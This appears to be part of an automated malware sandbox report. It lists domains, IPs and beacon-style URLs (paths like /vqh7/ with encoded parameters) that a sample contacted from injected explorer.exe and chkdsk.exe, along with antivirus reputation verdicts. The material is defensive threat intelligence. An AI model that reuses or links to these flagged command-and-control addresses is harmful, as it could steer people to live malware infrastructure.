          http://www.specigain.online0%Avira URL Cloudsafe
          http://www.gachthe365.siteReferer:0%Avira URL Cloudsafe
          http://www.frogair.online/vqh7/?hTb82V=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYPeQAzWlGbO7Jw==&ryQDc=vwyb4100%Avira URL Cloudmalware
          http://www.gachthe365.site/vqh7/100%Avira URL Cloudmalware
          http://www.treebarktees.com/vqh7/100%Avira URL Cloudmalware
          http://www.dinggubd.net/vqh7/0%Avira URL Cloudsafe
          http://www.gachthe365.site/vqh7/?hTb82V=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XwJzMQ03RKSfMg==&ryQDc=vwyb4100%Avira URL Cloudmalware
          http://www.verde-amar.info/vqh7/0%Avira URL Cloudsafe
          http://www.nkgtrust.org/vqh7/0%Avira URL Cloudsafe
          http://www.awc.icu/vqh7/100%Avira URL Cloudmalware
          http://www.jewelryimpact.com/vqh7/?hTb82V=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeED05Aw0pMEaxg==&ryQDc=vwyb40%Avira URL Cloudsafe
          http://www.krankenzusatz.net0%Avira URL Cloudsafe
          http://www.dinggubd.netReferer:0%Avira URL Cloudsafe
          http://www.heroclassicrally.co.uk/vqh7/-0%Avira URL Cloudsafe
          http://www.specigain.online/vqh7/100%Avira URL Cloudmalware
          http://www.dinggubd.net0%Avira URL Cloudsafe
          http://www.nativealternatives.comReferer:0%Avira URL Cloudsafe
          http://www.hotelyeah.top0%Avira URL Cloudsafe
          http://www.frogair.online100%Avira URL Cloudmalware
          http://www.jewelryimpact.com/vqh7/?ch=1&hTb82V=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4%2FWAP1IcCYAcw2um1tEg70%Avira URL Cloudsafe
          http://www.hotelyeah.top/vqh7/?hTb82V=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcRLjHL7QON+iJA==&ryQDc=vwyb4100%Avira URL Cloudmalware
          http://www.krankenzusatz.net/vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+W+lWgCrE9G0jw==&ryQDc=vwyb4100%Avira URL Cloudmalware
          http://www.specigain.online/vqh7/?hTb82V=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmpY5IvhiyUBgJg==&ryQDc=vwyb4100%Avira URL Cloudmalware
          http://www.nativealternatives.com/vqh7/100%Avira URL Cloudmalware
          http://www.frogair.onlineReferer:0%Avira URL Cloudsafe
          http://www.heroclassicrally.co.uk/vqh7/0%Avira URL Cloudsafe
          https://www.krankenzusatz.net/vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of0%Avira URL Cloudsafe
          http://www.nativealternatives.com0%Avira URL Cloudsafe
          http://www.frogair.online/vqh7/7100%Avira URL Cloudmalware
          http://www.awc.icu100%Avira URL Cloudmalware
          http://www.heroclassicrally.co.ukReferer:0%Avira URL Cloudsafe
          http://www.gachthe365.site100%Avira URL Cloudmalware
          http://www.tobinrasheedja.cyou0%Avira URL Cloudsafe
          http://www.otopodlogi.com0%Avira URL Cloudsafe
          http://www.awc.icuReferer:0%Avira URL Cloudsafe
          http://www.tobinrasheedja.cyou/vqh7/0%Avira URL Cloudsafe
          http://www.jewelryimpact.com/vqh7/0%Avira URL Cloudsafe
          http://www.nkgtrust.org0%Avira URL Cloudsafe
          http://www.krankenzusatz.netReferer:0%Avira URL Cloudsafe
          http://www.otopodlogi.comReferer:0%Avira URL Cloudsafe
          http://www.readyexechub.com/vqh7/0%Avira URL Cloudsafe
          http://www.nkgtrust.orgReferer:0%Avira URL Cloudsafe
          http://www.krankenzusatz.net/vqh7/100%Avira URL Cloudmalware
          http://www.frogair.online/vqh7/100%Avira URL Cloudmalware
          http://www.heroclassicrally.co.uk0%Avira URL Cloudsafe
          http://www.hotelyeah.top/vqh7/100%Avira URL Cloudmalware
          http://www.verde-amar.info0%Avira URL Cloudsafe
          http://www.readyexechub.com0%Avira URL Cloudsafe
          http://www.treebarktees.comReferer:0%Avira URL Cloudsafe
          http://www.treebarktees.com0%Avira URL Cloudsafe
          http://www.verde-amar.info/vqh7/?hTb82V=c3T4NncdiggRvhiDkOPUV54pY2f+jJK99/S+uCks/lUPYoCt0sy68wjf82DqpFtmKPoTAmkWX3bWObR3jmvMIkerc/mY+VSrAA==&ryQDc=vwyb40%Avira URL Cloudsafe
          http://www.jewelryimpact.com0%Avira URL Cloudsafe
          http://www.tobinrasheedja.cyouReferer:0%Avira URL Cloudsafe
          http://www.hotelyeah.top/vqh7/K6jN100%Avira URL Cloudmalware
          http://www.nativealternatives.com/vqh7/?hTb82V=Wal8eNVZj43YUX59PSGdwan825+QwmNgiW2tgvg58tiLWmT3NKzwSJHVqQ8whildXtpelu1/jOeS1tuPF4RPzbvyn9a9+nnCWg==&ryQDc=vwyb4100%Avira URL Cloudmalware
          http://www.heroclassicrally.co.uk/vqh7/?ch=1&hTb82V=lfF%2FIMXZC9z0Y8i3jJMV2iASSilbfJLlfXmtIcwvtHqqMq0%Avira URL Cloudsafe
          http://www.awc.icu/vqh7/o100%Avira URL Cloudmalware
          http://www.specigain.onlineReferer:0%Avira URL Cloudsafe
          http://www.hotelyeah.topReferer:0%Avira URL Cloudsafe
          http://www.otopodlogi.com/vqh7/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          krankenzusatz.net
          		81.169.145.158
          		truetrueunknown
          www.heroclassicrally.co.uk
          		81.17.29.148
          		truetrue
            		unknown
            www.nativealternatives.com
            		91.195.240.117
            		truetrue
              		unknown
              www.jewelryimpact.com
              		81.17.29.149
              		truetrue
                		unknown
                hotelyeah.top
                		75.102.22.168
                		truetrue
                  		unknown
                  gachthe365.site
                  		148.251.13.126
                  		truetrue
                    		unknown
                    www.awc.icu
                    		8.210.88.42
                    		truefalse
                      		unknown
                      www.specigain.online
                      		199.192.22.198
                      		truetrue
                        		unknown
                        frogair.online
                        		81.169.145.72
                        		truetrue
                          		unknown
                          www.verde-amar.info
                          		185.53.177.54
                          		truetrue
                            		unknown
                            www.treebarktees.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.hotelyeah.top
                              		unknown
                              		unknowntrue
                                		unknown
                                www.tobinrasheedja.cyou
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.gachthe365.site
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.frogair.online
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.krankenzusatz.net
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.gachthe365.site/vqh7/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.gachthe365.site/vqh7/?hTb82V=pVoWNihbCh2zr5CHItakBz03v8qzOfTDGJe3fnCW5FC8ht3krgFCJJZSjJ8fBA0610Gm6f/qx36kmOqdgM55XwJzMQ03RKSfMg==&ryQDc=vwyb4true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.frogair.online/vqh7/?hTb82V=6yP+4zmmFGehQ93JjA+P25coRCWIpu4kk0hKva5GiC1xzxOLQ03YJLnHpsQLSqMsYpfBQcl74Zo/h4S4tn0LYPeQAzWlGbO7Jw==&ryQDc=vwyb4true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.jewelryimpact.com/vqh7/?hTb82V=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeED05Aw0pMEaxg==&ryQDc=vwyb4true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.specigain.online/vqh7/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.hotelyeah.top/vqh7/?hTb82V=7D8/lBzEw/wsNost5L+U4EiZQqgBuaFyWQoeh5HgHjAV29hA+52JaGKa2IA6i84+uhqZsECRoLQWyY+/mGhgcRLjHL7QON+iJA==&ryQDc=vwyb4true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.nativealternatives.com/vqh7/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.krankenzusatz.net/vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of6ew4EgbD4Si63saT16r7LNb7qf0+W+lWgCrE9G0jw==&ryQDc=vwyb4true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.specigain.online/vqh7/?hTb82V=t1pNaIlB57t+2Br13rtd5l5qJnwIoRZHcaYdKNODTQQHpRjo5OTeCknNVcCO080ObvYdOnMGhI5gsKQpTmmnmpY5IvhiyUBgJg==&ryQDc=vwyb4true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.heroclassicrally.co.uk/vqh7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jewelryimpact.com/vqh7/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.krankenzusatz.net/vqh7/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.frogair.online/vqh7/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.hotelyeah.top/vqh7/true
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://www.verde-amar.info/vqh7/?hTb82V=c3T4NncdiggRvhiDkOPUV54pY2f+jJK99/S+uCks/lUPYoCt0sy68wjf82DqpFtmKPoTAmkWX3bWObR3jmvMIkerc/mY+VSrAA==&ryQDc=vwyb4true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nativealternatives.com/vqh7/?hTb82V=Wal8eNVZj43YUX59PSGdwan825+QwmNgiW2tgvg58tiLWmT3NKzwSJHVqQ8whildXtpelu1/jOeS1tuPF4RPzbvyn9a9+nnCWg==&ryQDc=vwyb4true
                                        • Avira URL Cloud: malware
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabchkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drfalse
                                          		high
                                          http://www.specigain.onlineexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.treebarktees.com/vqh7/explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://duckduckgo.com/ac/?q=50-ET7Wv7.3.drfalse
                                            		high
                                            http://www.frogair.onlineexplorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://www.gachthe365.siteReferer:explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://img.sedoparking.comchkdsk.exe, 00000003.00000002.574754750.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000003.00000002.575257315.0000000007E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://search.yahoo.com?fr=crmas_sfpfchkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drfalse
                                                		high
                                                http://www.verde-amar.info/vqh7/explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.dinggubd.net/vqh7/explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.nkgtrust.org/vqh7/explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.dinggubd.netReferer:explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.awc.icu/vqh7/explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.krankenzusatz.netexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.heroclassicrally.co.uk/vqh7/-explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referchkdsk.exe, 00000003.00000002.574754750.00000000062BE000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.hotelyeah.topexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.dinggubd.netexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nativealternatives.comReferer:explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.jewelryimpact.com/vqh7/?ch=1&hTb82V=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4%2FWAP1IcCYAcw2um1tEg7chkdsk.exe, 00000003.00000002.574754750.0000000005E08000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.frogair.onlineReferer:explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.krankenzusatz.net/vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Ofchkdsk.exe, 00000003.00000002.574754750.00000000065E2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.frogair.online/vqh7/7explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.nativealternatives.comexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.gachthe365.siteexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.awc.icuexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  		unknown
                                                  http://www.tobinrasheedja.cyouexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.heroclassicrally.co.ukReferer:explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.otopodlogi.comexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.nkgtrust.orgexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tobinrasheedja.cyou/vqh7/explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icochkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drfalse
                                                    		high
                                                    http://www.litespeedtech.com/error-pagechkdsk.exe, 00000003.00000002.574754750.0000000006774000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://www.awc.icuReferer:explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.krankenzusatz.netReferer:explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.otopodlogi.comReferer:explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=50-ET7Wv7.3.drfalse
                                                        		high
                                                        http://www.nkgtrust.orgReferer:explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchchkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drfalse
                                                          		high
                                                          http://www.readyexechub.com/vqh7/explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=chkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drfalse
                                                            		high
                                                            http://www.heroclassicrally.co.ukexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.sedo.com/services/parking.php3chkdsk.exe, 00000003.00000002.574754750.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000003.00000002.575257315.0000000007E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://ac.ecosia.org/autocomplete?q=50-ET7Wv7.3.drfalse
                                                                		high
                                                                https://search.yahoo.com?fr=crmas_sfpchkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drfalse
                                                                  		high
                                                                  http://www.treebarktees.comReferer:explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.verde-amar.infoexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.readyexechub.comexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.treebarktees.comexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.tucowsdomains.com/chkdsk.exe, 00000003.00000002.575257315.0000000007E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.tobinrasheedja.cyouReferer:explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.hotelyeah.top/vqh7/K6jNexplorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.jewelryimpact.comexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.awc.icu/vqh7/oexplorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    http://www.heroclassicrally.co.uk/vqh7/?ch=1&hTb82V=lfF%2FIMXZC9z0Y8i3jJMV2iASSilbfJLlfXmtIcwvtHqqMqchkdsk.exe, 00000003.00000002.575257315.0000000007E50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=50-ET7Wv7.3.drfalse
                                                                      		high
                                                                      http://www.specigain.onlineReferer:explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.hotelyeah.topReferer:explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.otopodlogi.com/vqh7/explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
